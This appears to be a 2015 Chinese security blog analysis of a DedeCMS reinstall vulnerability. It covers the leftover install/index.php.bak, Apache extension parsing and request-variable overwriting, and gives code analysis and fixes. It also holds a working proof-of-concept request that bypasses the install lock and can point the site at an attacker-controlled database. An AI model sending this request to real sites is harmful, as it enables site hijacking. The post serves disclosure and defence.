dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul
2015-05-15 13:40
656 查看
catalog
1. 漏洞描述
概括梳理一下这个漏洞的成因
[b][b][b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b][/b][/b]
2. 漏洞触发条件
0x1: POC
3. 漏洞影响范围
4. 漏洞代码分析
/install/index.php.bak
[b][b][b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b][/b][/b]
5. 防御方法
/install/index.php.bak
6. 攻防思考
在代码中的关键if判断处尽量避免使用变量,可以很大程度上防止本地变量覆盖导致的代码流黑黑客注入修改
[b][b][b][b][b][b][b][b][b][b][b][b]Copyright (c) 2015 LittleHann All rights reserved[/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b]
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
概括梳理一下这个漏洞的成因
1. dedecms默认情况下安装完成之后,install安装目录并未删除,即安装脚本依然存在,只是被重命名为了index.php.bak文件 //Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak 2. apache存在一个解析漏洞,即会递归的逐个解析文件的后缀,直到配对到一个可以正确处理的后缀处理函数(ext handler) //例如index.php.bak会被当成index.php来解析 3. dedecms广泛采用了"本地变量注册"的模拟实现,即 /* foreach(Array('_GET','_POST','_COOKIE') as $_request) { foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v); } */ 这导致黑客可以通过传入指定关键变量以此改变代码的正常流程逻辑,以此绕过dedecms的"已安装状态检查"逻辑,实现重安装
[b][b][b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b][/b][/b]
http://zhanzhang.anquan.org/vul-detail/51b19a3ff159c80f0ab0b8a1/
2. 漏洞触发条件
1. install文件夹存在 2. apache解析漏洞
0x1: POC
http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4 POST: step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk& //其中dbhost可以改为远程的黑客控制的db,以此达到劫持的目的
3. 漏洞影响范围
4. 漏洞代码分析
/install/index.php.bak
.. foreach(Array('_GET','_POST','_COOKIE') as $_request) { foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v); } require_once(DEDEINC.'/common.func.php'); //黑客通过本地变量注入,修改$insLockfile的值,以此绕过dede的检测逻辑 if(file_exists($insLockfile)) { exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!"); } ..
[b][b][b][b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b][/b][/b][/b]
http://www.cnseay.com/2956/
5. 防御方法
1. 删除install文件夹 or 2. 删除/install/index.php.bak 3. 允许用户使用重新安装的功能,但对index.php.bak进行修复
/install/index.php.bak
if( file_exists(dirname(__FILE__).'/install_lock.txt') ) { exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!"); }
6. 攻防思考
在代码中的关键if判断处尽量避免使用变量,可以很大程度上防止本地变量覆盖导致的代码流黑黑客注入修改
[b][b][b][b][b][b][b][b][b][b][b][b]Copyright (c) 2015 LittleHann All rights reserved[/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b]
相关文章推荐
- qibocms /hr/listperson.php File Arbitrarily Include Vul Via Variable Uninitialization && Front Page Upload WEBSHELL
- dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB && /include/dedesql.class.php
- Install Apache 2.2.15, MySQL 5.5.34 & PHP 5.5.4 on RHEL/CentOS 6.4/5.9 & Fedora 19-12
- dedecms在apache下的.bak当php运行的重装漏洞(含临时解决方案)
- log4j:ERROR A "org.jboss.logging.appender.FileAppender" object is not assignable to a "org.apache.lo
- 'Could not find first log file name in binary log index file'的解决办法
- 【tomcat】FileNotFoundException: C:\Program Files\Java\apache-tomcat-8.5.11-geneshop3\webapps\ROOT\index.html (拒绝访问。)
- Install Apache 2.2.15, MySQL 5.5.34 & PHP 5.5.4 on RHEL/CentOS 6.4/5.9 & Fedora 19-12 [转]
- eclipse 修改文件出现The original file 'detail.html' has been deleted or is not accessible.
- Install LAMP – Apache, MySQL & PHP on Ubuntu 11.10
- 腾讯云Ubuntu 14.04 & Apache 2.4.7 $ CI框架 之 如何去掉index.php后缀
- Install and configure Gnupg & Use Gnupg to encrypt file in PHP
- dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul
- PHPExcel的exception 'Exception' with message 'The filename is not recognised as an OLE file问题解决
- fedora - centos - apache - php - cannot write & delete file
- dedecms(<V5.7sp1) /install/index.php RFI
- Dedecms include\dialog\select_soft_post.php Upload Any Files To The Specified Directory Via Variable Not Initial Flaw Bypass Extension Defence
- Call to undefined function set_magic_quotes_runtime() in /opt/app/apache/install/index.php:12 Stack
- org.apache.jasper.JasperException: /index.jsp (line: 24, column: 26) attribute for %>" is not proper
- Discuz报:Please delete install/index.php via FTP!